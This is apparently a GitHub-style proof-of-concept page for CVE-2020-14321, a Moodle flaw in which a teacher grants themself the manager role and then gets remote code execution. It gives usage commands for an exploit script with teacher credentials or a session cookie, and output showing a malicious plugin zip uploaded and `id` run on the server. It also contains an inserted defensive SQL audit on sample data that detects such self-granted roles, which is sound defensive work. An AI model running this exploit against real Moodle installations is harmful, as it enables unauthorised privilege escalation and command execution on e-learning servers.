CVE-2020-14321 PoC — Moodle Permissions, Privileges, and Access Control Vulnerability

Associated Vulnerability
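Title: Moodle Permissions, Privileges, and Access Control Vulnerability (CVE-2020-14321)
Description: Moodle is a free, open-source e-learning software platform, also known as a course management system, learning management system, or virtual learning environment. Moodle contains a permissions and access control vulnerability, which stems from the program failing to apply correct security restrictions in course enrolment. A remote attacker can exploit this vulnerability to escalate privileges. The following products and versions are affected: Moodle 3.5.0 through 3.5.12, 3.7.0 through 3.7.6, 3.8.0 through 3.8.3, and 3.9.0.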
Description
Python script to exploit CVE-2020-14321 - Moodle 3.9 - Course enrollments allowed privilege escalation from teacher role into manager role to RCE.
Readme
Python script to exploit [CVE-2020-14321](https://moodle.org/mod/forum/discuss.php?d=407393) - **Moodle 3.9** 

Course enrolments allowed privilege escalation from teacher role into manager role to RCE.

* Teachers of a course were able to assign themselves the manager role within that course.

Payload extracted from: https://github.com/HoangKien1020/CVE-2020-14321
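
For defenders auditing a Moodle instance that ran an affected version, the following added example (not part of the original README or the PoC) lists manager role grants in course contexts that were made by a user holding a teacher role in that same course, which is the escalation described above. It assumes the default `mdl_` table prefix, default role shortnames, and only the columns shown; the in-memory rows are constructed sample data.

```python
import sqlite3

# Subset of Moodle's role tables (default "mdl_" prefix assumed); all rows are constructed.
SCHEMA = """
CREATE TABLE mdl_role (id INTEGER PRIMARY KEY, shortname TEXT);
CREATE TABLE mdl_context (id INTEGER PRIMARY KEY, contextlevel INTEGER, instanceid INTEGER);
CREATE TABLE mdl_role_assignments (
    id INTEGER PRIMARY KEY, roleid INTEGER, contextid INTEGER,
    userid INTEGER, modifierid INTEGER, timemodified INTEGER);
INSERT INTO mdl_role VALUES (1,'manager'),(3,'editingteacher'),(5,'student');
INSERT INTO mdl_context VALUES (1,10,0),(20,50,2),(21,50,3);  -- 10=system, 50=course
INSERT INTO mdl_role_assignments VALUES
  (1,3,20,7,2,1600000000),   -- admin (2) makes user 7 a teacher of course 2
  (2,1,20,7,7,1600000500),   -- user 7 grants manager to themself in course 2
  (3,1,21,8,2,1600000600),   -- admin grants manager to user 8 in course 3
  (4,3,21,9,2,1600000700),   -- admin makes user 9 a teacher of course 3
  (5,1,21,10,9,1600000800);  -- teacher 9 grants manager to user 10 in course 3
"""

# Manager grants at course level whose modifier holds a teacher role in that course.
AUDIT = """
SELECT ra.userid, ra.modifierid, ctx.instanceid AS courseid, ra.timemodified
FROM mdl_role_assignments ra
JOIN mdl_role r ON r.id = ra.roleid AND r.shortname = 'manager'
JOIN mdl_context ctx ON ctx.id = ra.contextid AND ctx.contextlevel = 50
WHERE EXISTS (
    SELECT 1 FROM mdl_role_assignments t
    JOIN mdl_role tr ON tr.id = t.roleid
    WHERE t.userid = ra.modifierid AND t.contextid = ra.contextid
      AND tr.shortname IN ('editingteacher', 'teacher'))
ORDER BY ra.timemodified
"""

def demo_db():
    """Build the constructed sample database in memory."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def suspicious_manager_grants(conn):
    """Return (userid, modifierid, courseid, timemodified, self_assigned) tuples."""
    return [row + (row[0] == row[1],) for row in conn.execute(AUDIT)]

if __name__ == "__main__":
    for hit in suspicious_manager_grants(demo_db()):
        print(hit)
```

Each hit is a lead for manual review rather than proof of compromise, since a site may have legitimately customised which roles teachers can assign.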

## Usage

If you have valid teacher credentials (InReaLife this has not been tested enough, or maybe yes, I don't know :P):

```bash
❭ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle -u lanz -p 'Lanz123$!'
```

If you have a valid teacher cookie (**101% tested**):

```bash
❱ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle --cookie th3f7k1ngggk00ci30ft3ach3r
```

...

```bash
❱ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle --cookie th3f7k1ngggk00ci30ft3ach3r -c id
 __     __     __   __  __   __              __  __     
/  \  /|_  __   _) /  \  _) /  \ __  /| |__|  _)  _) /| 
\__ \/ |__     /__ \__/ /__ \__/      |    | __) /__  | • by lanz

Moodle 3.9 - Remote Command Execution (Authenticated as teacher)
Course enrolments allowed privilege escalation from teacher role into manager role to RCE
                                                        
[+] Login on site: MoodleSession:th3f7k1ngggk00ci30ft3ach3r ✓
[+] Updating roles to move on manager accout: ✓
[+] Updating rol manager to enable install plugins: ✓
[+] Uploading malicious .zip file: ✓
[+] Executing id: ✓

uid=80(www) gid=80(www) groups=80(www)
```

Keep breaking ev3rYthiNg!!
File Snapshot

```
[4.0K] /data/pocs/c26413b45d1e44a84941247299ee9fa0a240ecc5
├── [ 38K] CVE-2020-14321_RCE.py
└── [1.5K] README.md

0 directories, 2 files
```